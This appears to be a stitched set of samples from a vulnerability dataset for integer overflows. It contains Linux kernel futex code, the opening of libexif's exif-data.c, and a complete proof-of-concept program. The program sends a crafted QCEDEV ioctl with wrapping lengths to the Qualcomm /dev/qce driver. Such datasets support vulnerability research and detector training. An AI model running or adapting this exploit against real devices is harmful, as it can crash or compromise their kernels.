put_pi_state(pi_state);
/*
* Success, we're done! No tricky corner cases.
*/
if (!ret)
goto out_putkey;
/*
* The atomic access to the futex value generated a
* pagefault, so retry the user-access and the wakeup:
*/
if (ret == -EFAULT)
goto pi_faulted;
/*
* A unconditional UNLOCK_PI op raced against a waiter
* setting the FUTEX_WAITERS bit. Try again.
*/
if (ret == -EAGAIN) {
put_futex_key(&key);
goto retry;
}
/*
* wake_futex_pi has detected invalid state. Tell user
* space.
*/
goto out_putkey;
}
/*
* We have no kernel internal state, i.e. no waiters in the
* kernel. Waiters which are about to queue themselves are stuck
	 * on hb->lock. So we can safely ignore them. We neither
	 * preserve the WAITERS bit nor the OWNER_DIED one. We are the
* owner.
*/
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, 0)) {
spin_unlock(&hb->lock);
goto pi_faulted;
}
/*
* If uval has changed, let user space handle it.
*/
ret = (curval == uval) ? 0 : -EAGAIN;
out_unlock:
spin_unlock(&hb->lock);
out_putkey:
put_futex_key(&key);
return ret;
pi_faulted:
put_futex_key(&key);
ret = fault_in_user_writeable(uaddr);
if (!ret)
goto retry;
return ret;
}
/**
* handle_early_requeue_pi_wakeup() - Detect early wakeup on the initial futex
* @hb: the hash_bucket futex_q was original enqueued on
* @q: the futex_q woken while waiting to be requeued
* @key2: the futex_key of the requeue target futex
* @timeout: the timeout associated with the wait (NULL if none)
*
* Detect if the task was woken on the initial futex as opposed to the requeue
* target futex. If so, determine if it was a timeout or a signal that caused
* the wakeup and return the appropriate error code to the caller. Must be
* called with the hb lock held.
*
* Return:
* - 0 = no early wakeup detected;
* - <0 = -ETIMEDOUT or -ERESTARTNOINTR
*/
static inline
int handle_early_requeue_pi_wakeup(struct futex_hash_bucket *hb,
struct futex_q *q, union futex_key *key2,
struct hrtimer_sleeper *timeout)
{
int ret = 0;
/*
* With the hb lock held, we avoid races while we process the wakeup.
* We only need to hold hb (and not hb2) to ensure atomicity as the
* wakeup code can't change q.key from uaddr to uaddr2 if we hold hb.
* It can't be requeued from uaddr2 to something else since we don't
* support a PI aware source futex for requeue.
*/
if (!match_futex(&q->key, key2)) {
WARN_ON(q->lock_ptr && (&hb->lock != q->lock_ptr));
/*
* We were woken prior to requeue by a timeout or a signal.
* Unqueue the futex_q and determine which it was.
*/
plist_del(&q->list, &hb->chain);
hb_waiters_dec(hb);
/* Handle spurious wakeups gracefully */
ret = -EWOULDBLOCK;
if (timeout && !timeout->task)
ret = -ETIMEDOUT;
else if (signal_pending(current))
ret = -ERESTARTNOINTR;
}
return ret;
}
/**
* futex_wait_requeue_pi() - Wait on uaddr and take uaddr2
* @uaddr: the futex we initially wait on (non-pi)
* @flags: futex flags (FLAGS_SHARED, FLAGS_CLOCKRT, etc.), they must be
* the same type, no requeueing from private to shared, etc.
* @val: the expected value of uaddr
* @abs_time: absolute timeout
* @bitset: 32 bit wakeup bitset set by userspace, defaults to all
* @uaddr2: the pi futex we will take prior to returning to user-space
*
* The caller will wait on uaddr and will be requeued by futex_requeue() to
* uaddr2 which must be PI aware and unique from uaddr. Normal wakeup will wake
* on uaddr2 and complete the acquisition of the rt_mutex prior to returning to
* userspace. This ensures the rt_mutex maintains an owner when it has waiters;
* without one, the pi logic would not know which task to boost/deboost, if
* there was a need to.
*
* We call schedule in futex_wait_queue_me() when we enqueue and return there
 * via one of the following:
* 1) wakeup on uaddr2 after an atomic lock acquisition by futex_requeue()
* 2) wakeup on uaddr2 after a requeue
* 3) signal
* 4) timeout
*
* If 3, cleanup and return -ERESTARTNOINTR.
*
* If 2, we may then block on trying to take the rt_mutex and return via:
* 5) successful lock
* 6) signal
* 7) timeout
* 8) other lock acquisition failure
*
* If 6, return -EWOULDBLOCK (restarting the syscall would do the same).
*
* If 4 or 7, we cleanup and return with -ETIMEDOUT.
*
* Return:
* - 0 - On success;
* - <0 - On error
*/
static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
u32 val, ktime_t *abs_time, u32 bitset,
u32 __user *uaddr2)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct futex_pi_state *pi_state = NULL;
struct rt_mutex_waiter rt_waiter;
struct futex_hash_bucket *hb;
union futex_key key2 = FUTEX_KEY_INIT;
struct futex_q q = futex_q_init;
int res, ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
if (uaddr == uaddr2)
return -EINVAL;
if (!bitset)
return -EINVAL;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
/*
* The waiter is allocated on our stack, manipulated by the requeue
* code while we sleep on uaddr.
*/
rt_mutex_init_waiter(&rt_waiter);
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
q.bitset = bitset;
q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;
/*
* Prepare to wait on uaddr. On success, increments q.key (key1) ref
* count.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out_key2;
/*
* The check above which compares uaddrs is not sufficient for
* shared futexes. We need to compare the keys:
*/
if (match_futex(&q.key, &key2)) {
queue_unlock(hb);
ret = -EINVAL;
goto out_put_keys;
}
/* Queue the futex_q, drop the hb lock, wait for wakeup. */
futex_wait_queue_me(hb, &q, to);
spin_lock(&hb->lock);
ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
spin_unlock(&hb->lock);
if (ret)
goto out_put_keys;
/*
* In order for us to be here, we know our q.key == key2, and since
* we took the hb->lock above, we also know that futex_requeue() has
* completed and we no longer have to concern ourselves with a wakeup
* race with the atomic proxy lock acquisition by the requeue code. The
* futex_requeue dropped our key1 reference and incremented our key2
* reference count.
*/
/* Check if the requeue code acquired the second futex for us. */
if (!q.rt_waiter) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/
if (q.pi_state && (q.pi_state->owner != current)) {
spin_lock(q.lock_ptr);
ret = fixup_pi_state_owner(uaddr2, &q, current);
if (ret && rt_mutex_owner(&q.pi_state->pi_mutex) == current) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/*
* Drop the reference to the pi state which
* the requeue_pi() code acquired for us.
*/
put_pi_state(q.pi_state);
spin_unlock(q.lock_ptr);
}
} else {
struct rt_mutex *pi_mutex;
/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/
WARN_ON(!q.pi_state);
pi_mutex = &q.pi_state->pi_mutex;
ret = rt_mutex_wait_proxy_lock(pi_mutex, to, &rt_waiter);
spin_lock(q.lock_ptr);
if (ret && !rt_mutex_cleanup_proxy_lock(pi_mutex, &rt_waiter))
ret = 0;
debug_rt_mutex_free_waiter(&rt_waiter);
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr2, &q, !ret);
/*
		 * If fixup_owner() returned an error, propagate that. If it
* acquired the lock, clear -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/*
* If fixup_pi_state_owner() faulted and was unable to handle
* the fault, unlock the rt_mutex and return the fault to
* userspace.
*/
if (ret && rt_mutex_owner(&q.pi_state->pi_mutex) == current) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/* Unqueue and drop the lock. */
unqueue_me_pi(&q);
}
if (pi_state) {
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
}
if (ret == -EINTR) {
/*
* We've already been requeued, but cannot restart by calling
* futex_lock_pi() directly. We could restart this syscall, but
* it would detect that the user space "val" changed and return
* -EWOULDBLOCK. Save the overhead of the restart and return
* -EWOULDBLOCK directly.
*/
ret = -EWOULDBLOCK;
}
out_put_keys:
put_futex_key(&q.key);
out_key2:
put_futex_key(&key2);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
/*
* Support for robust futexes: the kernel cleans up held futexes at
* thread exit time.
*
* Implementation: user-space maintains a per-thread list of locks it
* is holding. Upon do_exit(), the kernel carefully walks this list,
* and marks all locks that are owned by this thread with the
* FUTEX_OWNER_DIED bit, and wakes up a waiter (if any). The list is
* always manipulated with the lock held, so the list is private and
* per-thread. Userspace also maintains a per-thread 'list_op_pending'
* field, to allow the kernel to clean up if the thread dies after
* acquiring the lock, but just before it could have added itself to
* the list. There can only be one such pending lock.
*/
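/*
 * Illustrative user space side (a minimal sketch only; names such as
 * my_robust_mutex are made up here, and real implementations like glibc
 * differ in detail):
 *
 *	struct my_robust_mutex {
 *		struct robust_list	node;		// links into the per-thread list
 *		uint32_t		futex_word;	// TID of the owner, 0 if free
 *	};
 *
 *	static __thread struct robust_list_head head;
 *
 *	head.list.next	     = &head.list;	// empty list points back to itself
 *	head.futex_offset    = offsetof(struct my_robust_mutex, futex_word) -
 *			       offsetof(struct my_robust_mutex, node);
 *	head.list_op_pending = NULL;
 *	syscall(SYS_set_robust_list, &head, sizeof(head));
 *
 * On lock, the thread stores the mutex in head.list_op_pending, acquires
 * the futex word (0 -> TID) and links node into head.list; unlock does the
 * reverse. exit_robust_list() below walks this list on thread exit and
 * finds each futex word at "entry + futex_offset", exactly as encoded
 * above.
 */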
/**
* sys_set_robust_list() - Set the robust-futex list head of a task
* @head: pointer to the list-head
* @len: length of the list-head, as userspace expects
*/
SYSCALL_DEFINE2(set_robust_list, struct robust_list_head __user *, head,
size_t, len)
{
if (!futex_cmpxchg_enabled)
return -ENOSYS;
/*
* The kernel knows only one size for now:
*/
if (unlikely(len != sizeof(*head)))
return -EINVAL;
current->robust_list = head;
return 0;
}
/**
* sys_get_robust_list() - Get the robust-futex list head of a task
* @pid: pid of the process [zero for current task]
* @head_ptr: pointer to a list-head pointer, the kernel fills it in
* @len_ptr: pointer to a length field, the kernel fills in the header size
*/
SYSCALL_DEFINE3(get_robust_list, int, pid,
struct robust_list_head __user * __user *, head_ptr,
size_t __user *, len_ptr)
{
struct robust_list_head __user *head;
unsigned long ret;
struct task_struct *p;
if (!futex_cmpxchg_enabled)
return -ENOSYS;
rcu_read_lock();
ret = -ESRCH;
if (!pid)
p = current;
else {
p = find_task_by_vpid(pid);
if (!p)
goto err_unlock;
}
ret = -EPERM;
if (!ptrace_may_access(p, PTRACE_MODE_READ_REALCREDS))
goto err_unlock;
head = p->robust_list;
rcu_read_unlock();
if (put_user(sizeof(*head), len_ptr))
return -EFAULT;
return put_user(head, head_ptr);
err_unlock:
rcu_read_unlock();
return ret;
}
/*
* Process a futex-list entry, check whether it's owned by the
* dying task, and do notification if so:
*/
int handle_futex_death(u32 __user *uaddr, struct task_struct *curr, int pi)
{
u32 uval, uninitialized_var(nval), mval;
retry:
if (get_user(uval, uaddr))
return -1;
if ((uval & FUTEX_TID_MASK) == task_pid_vnr(curr)) {
/*
* Ok, this dying thread is truly holding a futex
* of interest. Set the OWNER_DIED bit atomically
* via cmpxchg, and if the value had FUTEX_WAITERS
* set, wake up a waiter (if any). (We have to do a
* futex_wake() even if OWNER_DIED is already set -
* to handle the rare but possible case of recursive
* thread-death.) The rest of the cleanup is done in
* userspace.
*/
mval = (uval & FUTEX_WAITERS) | FUTEX_OWNER_DIED;
/*
* We are not holding a lock here, but we want to have
* the pagefault_disable/enable() protection because
* we want to handle the fault gracefully. If the
* access fails we try to fault in the futex with R/W
* verification via get_user_pages. get_user() above
* does not guarantee R/W access. If that fails we
* give up and leave the futex locked.
*/
if (cmpxchg_futex_value_locked(&nval, uaddr, uval, mval)) {
if (fault_in_user_writeable(uaddr))
return -1;
goto retry;
}
if (nval != uval)
goto retry;
/*
* Wake robust non-PI futexes here. The wakeup of
* PI futexes happens in exit_pi_state():
*/
if (!pi && (uval & FUTEX_WAITERS))
futex_wake(uaddr, 1, 1, FUTEX_BITSET_MATCH_ANY);
}
return 0;
}
/*
* Fetch a robust-list pointer. Bit 0 signals PI futexes:
*/
static inline int fetch_robust_entry(struct robust_list __user **entry,
struct robust_list __user * __user *head,
unsigned int *pi)
{
unsigned long uentry;
if (get_user(uentry, (unsigned long __user *)head))
return -EFAULT;
*entry = (void __user *)(uentry & ~1UL);
*pi = uentry & 1;
return 0;
}
/*
* Walk curr->robust_list (very carefully, it's a userspace list!)
* and mark any locks found there dead, and notify any waiters.
*
* We silently return on any sign of list-walking problem.
*/
void exit_robust_list(struct task_struct *curr)
{
struct robust_list_head __user *head = curr->robust_list;
struct robust_list __user *entry, *next_entry, *pending;
unsigned int limit = ROBUST_LIST_LIMIT, pi, pip;
unsigned int uninitialized_var(next_pi);
unsigned long futex_offset;
int rc;
if (!futex_cmpxchg_enabled)
return;
/*
* Fetch the list head (which was registered earlier, via
* sys_set_robust_list()):
*/
if (fetch_robust_entry(&entry, &head->list.next, &pi))
return;
/*
* Fetch the relative futex offset:
*/
if (get_user(futex_offset, &head->futex_offset))
return;
/*
* Fetch any possibly pending lock-add first, and handle it
* if it exists:
*/
if (fetch_robust_entry(&pending, &head->list_op_pending, &pip))
return;
next_entry = NULL; /* avoid warning with gcc */
while (entry != &head->list) {
/*
* Fetch the next entry in the list before calling
* handle_futex_death:
*/
rc = fetch_robust_entry(&next_entry, &entry->next, &next_pi);
/*
* A pending lock might already be on the list, so
* don't process it twice:
*/
if (entry != pending)
if (handle_futex_death((void __user *)entry + futex_offset,
curr, pi))
return;
if (rc)
return;
entry = next_entry;
pi = next_pi;
/*
* Avoid excessively long or circular lists:
*/
if (!--limit)
break;
cond_resched();
}
if (pending)
handle_futex_death((void __user *)pending + futex_offset,
curr, pip);
}
long do_futex(u32 __user *uaddr, int op, u32 val, ktime_t *timeout,
u32 __user *uaddr2, u32 val2, u32 val3)
{
int cmd = op & FUTEX_CMD_MASK;
unsigned int flags = 0;
if (!(op & FUTEX_PRIVATE_FLAG))
flags |= FLAGS_SHARED;
if (op & FUTEX_CLOCK_REALTIME) {
flags |= FLAGS_CLOCKRT;
if (cmd != FUTEX_WAIT && cmd != FUTEX_WAIT_BITSET && \
cmd != FUTEX_WAIT_REQUEUE_PI)
return -ENOSYS;
}
switch (cmd) {
case FUTEX_LOCK_PI:
case FUTEX_UNLOCK_PI:
case FUTEX_TRYLOCK_PI:
case FUTEX_WAIT_REQUEUE_PI:
case FUTEX_CMP_REQUEUE_PI:
if (!futex_cmpxchg_enabled)
return -ENOSYS;
}
switch (cmd) {
case FUTEX_WAIT:
val3 = FUTEX_BITSET_MATCH_ANY;
case FUTEX_WAIT_BITSET:
return futex_wait(uaddr, flags, val, timeout, val3);
case FUTEX_WAKE:
val3 = FUTEX_BITSET_MATCH_ANY;
case FUTEX_WAKE_BITSET:
return futex_wake(uaddr, flags, val, val3);
case FUTEX_REQUEUE:
return futex_requeue(uaddr, flags, uaddr2, val, val2, NULL, 0);
case FUTEX_CMP_REQUEUE:
return futex_requeue(uaddr, flags, uaddr2, val, val2, &val3, 0);
case FUTEX_WAKE_OP:
return futex_wake_op(uaddr, flags, uaddr2, val, val2, val3);
case FUTEX_LOCK_PI:
return futex_lock_pi(uaddr, flags, timeout, 0);
case FUTEX_UNLOCK_PI:
return futex_unlock_pi(uaddr, flags);
case FUTEX_TRYLOCK_PI:
return futex_lock_pi(uaddr, flags, NULL, 1);
case FUTEX_WAIT_REQUEUE_PI:
val3 = FUTEX_BITSET_MATCH_ANY;
return futex_wait_requeue_pi(uaddr, flags, val, timeout, val3,
uaddr2);
case FUTEX_CMP_REQUEUE_PI:
return futex_requeue(uaddr, flags, uaddr2, val, val2, &val3, 1);
}
return -ENOSYS;
}
SYSCALL_DEFINE6(futex, u32 __user *, uaddr, int, op, u32, val,
struct timespec __user *, utime, u32 __user *, uaddr2,
u32, val3)
{
struct timespec ts;
ktime_t t, *tp = NULL;
u32 val2 = 0;
int cmd = op & FUTEX_CMD_MASK;
if (utime && (cmd == FUTEX_WAIT || cmd == FUTEX_LOCK_PI ||
cmd == FUTEX_WAIT_BITSET ||
cmd == FUTEX_WAIT_REQUEUE_PI)) {
if (unlikely(should_fail_futex(!(op & FUTEX_PRIVATE_FLAG))))
return -EFAULT;
if (copy_from_user(&ts, utime, sizeof(ts)) != 0)
return -EFAULT;
if (!timespec_valid(&ts))
return -EINVAL;
t = timespec_to_ktime(ts);
if (cmd == FUTEX_WAIT)
t = ktime_add_safe(ktime_get(), t);
tp = &t;
}
/*
* requeue parameter in 'utime' if cmd == FUTEX_*_REQUEUE_*.
* number of waiters to wake in 'utime' if cmd == FUTEX_WAKE_OP.
*/
if (cmd == FUTEX_REQUEUE || cmd == FUTEX_CMP_REQUEUE ||
cmd == FUTEX_CMP_REQUEUE_PI || cmd == FUTEX_WAKE_OP)
val2 = (u32) (unsigned long) utime;
return do_futex(uaddr, op, val, tp, uaddr2, val2, val3);
}
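/*
 * Minimal userspace sketch of the common wait/wake pairing dispatched by
 * do_futex() above (illustrative only; assumes <linux/futex.h> and
 * SYS_futex are available, and uses the private-futex variants):
 *
 *   #include <linux/futex.h>
 *   #include <sys/syscall.h>
 *   #include <unistd.h>
 *   #include <stdatomic.h>
 *   #include <stdint.h>
 *
 *   static _Atomic uint32_t word;
 *
 *   static long futex(uint32_t *uaddr, int op, uint32_t val)
 *   {
 *           return syscall(SYS_futex, uaddr, op, val, NULL, NULL, 0);
 *   }
 *
 *   // waiter: blocks while the word is still 0
 *   //   futex((uint32_t *)&word, FUTEX_WAIT_PRIVATE, 0);
 *   // waker:
 *   //   atomic_store(&word, 1);
 *   //   futex((uint32_t *)&word, FUTEX_WAKE_PRIVATE, 1);
 */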
static void __init futex_detect_cmpxchg(void)
{
#ifndef CONFIG_HAVE_FUTEX_CMPXCHG
u32 curval;
/*
* This will fail and we want it. Some arch implementations do
* runtime detection of the futex_atomic_cmpxchg_inatomic()
* functionality. We want to know that before we call in any
* of the complex code paths. Also we want to prevent
* registration of robust lists in that case. NULL is
* guaranteed to fault and we get -EFAULT on functional
* implementation, the non-functional ones will return
* -ENOSYS.
*/
if (cmpxchg_futex_value_locked(&curval, NULL, 0, 0) == -EFAULT)
futex_cmpxchg_enabled = 1;
#endif
}
static int __init futex_init(void)
{
unsigned int futex_shift;
unsigned long i;
#if CONFIG_BASE_SMALL
futex_hashsize = 16;
#else
futex_hashsize = roundup_pow_of_two(256 * num_possible_cpus());
#endif
futex_queues = alloc_large_system_hash("futex", sizeof(*futex_queues),
futex_hashsize, 0,
futex_hashsize < 256 ? HASH_SMALL : 0,
&futex_shift, NULL,
futex_hashsize, futex_hashsize);
futex_hashsize = 1UL << futex_shift;
futex_detect_cmpxchg();
for (i = 0; i < futex_hashsize; i++) {
atomic_set(&futex_queues[i].waiters, 0);
plist_head_init(&futex_queues[i].chain);
spin_lock_init(&futex_queues[i].lock);
}
return 0;
}
core_initcall(futex_init);
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_620_0 |
crossvul-cpp_data_good_2492_0 | #include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <string.h> /* strerror() */
#include <errno.h> /* errno */
/*
* PoC By Scott Bauer
* Bug found by derrek
*/
static const char *dev = "/dev/qce";
#define QCEDEV_MAX_KEY_SIZE 64
#define QCEDEV_MAX_IV_SIZE 32
#define QCEDEV_MAX_BUFFERS 16
struct buf_info {
union {
uint32_t offset;
uint8_t *vaddr;
};
uint32_t len;
};
struct qcedev_vbuf_info {
struct buf_info src[QCEDEV_MAX_BUFFERS];
struct buf_info dst[QCEDEV_MAX_BUFFERS];
};
struct qcedev_pmem_info {
int fd_src;
struct buf_info src[QCEDEV_MAX_BUFFERS];
int fd_dst;
struct buf_info dst[QCEDEV_MAX_BUFFERS];
};
enum qcedev_oper_enum {
QCEDEV_OPER_DEC = 0,
QCEDEV_OPER_ENC = 1,
QCEDEV_OPER_DEC_NO_KEY = 2,
QCEDEV_OPER_ENC_NO_KEY = 3,
QCEDEV_OPER_LAST
};
enum qcedev_cipher_alg_enum {
QCEDEV_ALG_DES = 0,
QCEDEV_ALG_3DES = 1,
QCEDEV_ALG_AES = 2,
QCEDEV_ALG_LAST
};
enum qcedev_cipher_mode_enum {
QCEDEV_AES_MODE_CBC = 0,
QCEDEV_AES_MODE_ECB = 1,
QCEDEV_AES_MODE_CTR = 2,
QCEDEV_AES_MODE_XTS = 3,
QCEDEV_AES_MODE_CCM = 4,
QCEDEV_DES_MODE_CBC = 5,
QCEDEV_DES_MODE_ECB = 6,
QCEDEV_AES_DES_MODE_LAST
};
struct qcedev_cipher_op_req {
uint8_t use_pmem;
union {
struct qcedev_pmem_info pmem;
struct qcedev_vbuf_info vbuf;
};
uint32_t entries;
uint32_t data_len;
uint8_t in_place_op;
uint8_t enckey[QCEDEV_MAX_KEY_SIZE];
uint32_t encklen;
uint8_t iv[QCEDEV_MAX_IV_SIZE];
uint32_t ivlen;
uint32_t byteoffset;
enum qcedev_cipher_alg_enum alg;
enum qcedev_cipher_mode_enum mode;
enum qcedev_oper_enum op;
};
#define QCEDEV_IOC_MAGIC 0x87
#define QCEDEV_IOCTL_ENC_REQ \
_IOWR(QCEDEV_IOC_MAGIC, 1, struct qcedev_cipher_op_req)
#define QCEDEV_IOCTL_DEC_REQ \
_IOWR(QCEDEV_IOC_MAGIC, 2, struct qcedev_cipher_op_req)
void thread_func(unsigned int start, unsigned int end, int fd)
{
struct qcedev_cipher_op_req req = { 0 };
unsigned int i;
char *data;
data = mmap(NULL, 0xFFFFFF * 3, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
if (data == MAP_FAILED) {
printf("mmap failed, get a better phone\n");
exit(0);
}
for (i = 0; i < 0xFFFFFF * 3; i += sizeof(void*))
*((unsigned long *)(data + i)) = 0xABADACC355001337;
req.in_place_op = 1;
/* setup the parameters to pass a few sanity checks */
req.entries = 2;
req.byteoffset = 15;
req.mode = QCEDEV_AES_MODE_CTR;
req.op = QCEDEV_OPER_ENC;//_NO_KEY;
req.ivlen = 1;
req.data_len = 0xFFFFFFFE;
req.vbuf.src[0].len = 4;
req.vbuf.src[1].len = 0xFFFFFFFE - 4;
req.vbuf.src[0].vaddr = (uint8_t*)data;
req.vbuf.src[1].vaddr = (uint8_t*)data;
req.vbuf.dst[0].len = 4;
req.vbuf.dst[1].len = 0xFFFFFFFE - 4;
req.vbuf.dst[0].vaddr = (uint8_t*)data;
req.vbuf.dst[1].vaddr = (uint8_t*)data;
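/*
 * Why these values (a hedged reading, given the CWE-190 label on this
 * PoC): data_len is close to UINT32_MAX while byteoffset is non-zero and
 * the per-buffer lengths sum back up to data_len, so the driver's 32-bit
 * length/offset arithmetic is expected to wrap during its sanity checks
 * and let an oversized request through. The exact check that overflows
 * depends on the qcedev driver version being targeted.
 */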
ioctl(fd, QCEDEV_IOCTL_ENC_REQ, &req);
printf("exiting\n");
exit(0);
}
int main(void)
{
int fd;
unsigned int i;
unsigned int start = 0;
unsigned int _gap = ~0;
unsigned int gap = _gap / 8;
struct qcedev_cipher_op_req req = { 0 };
//char data[32] = { A };
char *data;
fd = open(dev, O_RDWR);
if (fd < 0) {
printf("Failed to open %s with errno %s\n", dev,
strerror(errno));
return EXIT_FAILURE;
}
thread_func(start, start + gap, fd);
sleep(1000000);
return EXIT_FAILURE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_2492_0 |
crossvul-cpp_data_good_1433_0 | /* exif-data.c
*
* Copyright (c) 2001 Lutz Mueller <lutz@users.sourceforge.net>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301 USA.
*/
#include <config.h>
#include <libexif/exif-mnote-data.h>
#include <libexif/exif-data.h>
#include <libexif/exif-ifd.h>
#include <libexif/exif-mnote-data-priv.h>
#include <libexif/exif-utils.h>
#include <libexif/exif-loader.h>
#include <libexif/exif-log.h>
#include <libexif/i18n.h>
#include <libexif/exif-system.h>
#include <libexif/canon/exif-mnote-data-canon.h>
#include <libexif/fuji/exif-mnote-data-fuji.h>
#include <libexif/olympus/exif-mnote-data-olympus.h>
#include <libexif/pentax/exif-mnote-data-pentax.h>
#include <math.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#undef JPEG_MARKER_SOI
#define JPEG_MARKER_SOI 0xd8
#undef JPEG_MARKER_APP0
#define JPEG_MARKER_APP0 0xe0
#undef JPEG_MARKER_APP1
#define JPEG_MARKER_APP1 0xe1
static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
struct _ExifDataPrivate
{
ExifByteOrder order;
ExifMnoteData *md;
ExifLog *log;
ExifMem *mem;
unsigned int ref_count;
/* Temporarily used while loading data */
unsigned int offset_mnote;
ExifDataOption options;
ExifDataType data_type;
};
static void *
exif_data_alloc (ExifData *data, unsigned int i)
{
void *d;
if (!data || !i)
return NULL;
d = exif_mem_alloc (data->priv->mem, i);
if (d)
return d;
EXIF_LOG_NO_MEMORY (data->priv->log, "ExifData", i);
return NULL;
}
ExifMnoteData *
exif_data_get_mnote_data (ExifData *d)
{
return (d && d->priv) ? d->priv->md : NULL;
}
ExifData *
exif_data_new (void)
{
ExifMem *mem = exif_mem_new_default ();
ExifData *d = exif_data_new_mem (mem);
exif_mem_unref (mem);
return d;
}
ExifData *
exif_data_new_mem (ExifMem *mem)
{
ExifData *data;
unsigned int i;
if (!mem)
return NULL;
data = exif_mem_alloc (mem, sizeof (ExifData));
if (!data)
return (NULL);
data->priv = exif_mem_alloc (mem, sizeof (ExifDataPrivate));
if (!data->priv) {
exif_mem_free (mem, data);
return (NULL);
}
data->priv->ref_count = 1;
data->priv->mem = mem;
exif_mem_ref (mem);
for (i = 0; i < EXIF_IFD_COUNT; i++) {
data->ifd[i] = exif_content_new_mem (data->priv->mem);
if (!data->ifd[i]) {
exif_data_free (data);
return (NULL);
}
data->ifd[i]->parent = data;
}
/* Default options */
#ifndef NO_VERBOSE_TAG_STRINGS
/*
* When the tag list is compiled away, setting this option prevents
* any tags from being loaded
*/
exif_data_set_option (data, EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS);
#endif
exif_data_set_option (data, EXIF_DATA_OPTION_FOLLOW_SPECIFICATION);
/* Default data type: none */
exif_data_set_data_type (data, EXIF_DATA_TYPE_COUNT);
return (data);
}
ExifData *
exif_data_new_from_data (const unsigned char *data, unsigned int size)
{
ExifData *edata;
edata = exif_data_new ();
exif_data_load_data (edata, data, size);
return (edata);
}
static int
exif_data_load_data_entry (ExifData *data, ExifEntry *entry,
const unsigned char *d,
unsigned int size, unsigned int offset)
{
unsigned int s, doff;
entry->tag = exif_get_short (d + offset + 0, data->priv->order);
entry->format = exif_get_short (d + offset + 2, data->priv->order);
entry->components = exif_get_long (d + offset + 4, data->priv->order);
/* FIXME: should use exif_tag_get_name_in_ifd here but entry->parent
* has not been set yet
*/
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Loading entry 0x%x ('%s')...", entry->tag,
exif_tag_get_name (entry->tag));
/* {0,1,2,4,8} x { 0x00000000 .. 0xffffffff }
* -> { 0x000000000 .. 0x7fffffff8 } */
s = exif_format_get_size(entry->format) * entry->components;
if ((s < entry->components) || (s == 0)){
return 0;
}
/*
* Size? If bigger than 4 bytes, the actual data is not
* in the entry but somewhere else (offset).
*/
if (s > 4)
doff = exif_get_long (d + offset + 8, data->priv->order);
else
doff = offset + 8;
/* Sanity checks */
if (doff >= size) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Tag starts past end of buffer (%u > %u)", doff, size);
return 0;
}
if (s > size - doff) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Tag data goes past end of buffer (%u > %u)", doff+s, size);
return 0;
}
entry->data = exif_data_alloc (data, s);
if (entry->data) {
entry->size = s;
memcpy (entry->data, d + doff, s);
} else {
EXIF_LOG_NO_MEMORY(data->priv->log, "ExifData", s);
return 0;
}
/* If this is the MakerNote, remember the offset */
if (entry->tag == EXIF_TAG_MAKER_NOTE) {
if (!entry->data) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"MakerNote found with empty data");
} else if (entry->size > 6) {
exif_log (data->priv->log,
EXIF_LOG_CODE_DEBUG, "ExifData",
"MakerNote found (%02x %02x %02x %02x "
"%02x %02x %02x...).",
entry->data[0], entry->data[1], entry->data[2],
entry->data[3], entry->data[4], entry->data[5],
entry->data[6]);
}
data->priv->offset_mnote = doff;
}
return 1;
}
static void
exif_data_save_data_entry (ExifData *data, ExifEntry *e,
unsigned char **d, unsigned int *ds,
unsigned int offset)
{
unsigned int doff, s;
unsigned int ts;
if (!data || !data->priv)
return;
/*
* Each entry is 12 bytes long. The memory for the entry has
* already been allocated.
*/
exif_set_short (*d + 6 + offset + 0,
data->priv->order, (ExifShort) e->tag);
exif_set_short (*d + 6 + offset + 2,
data->priv->order, (ExifShort) e->format);
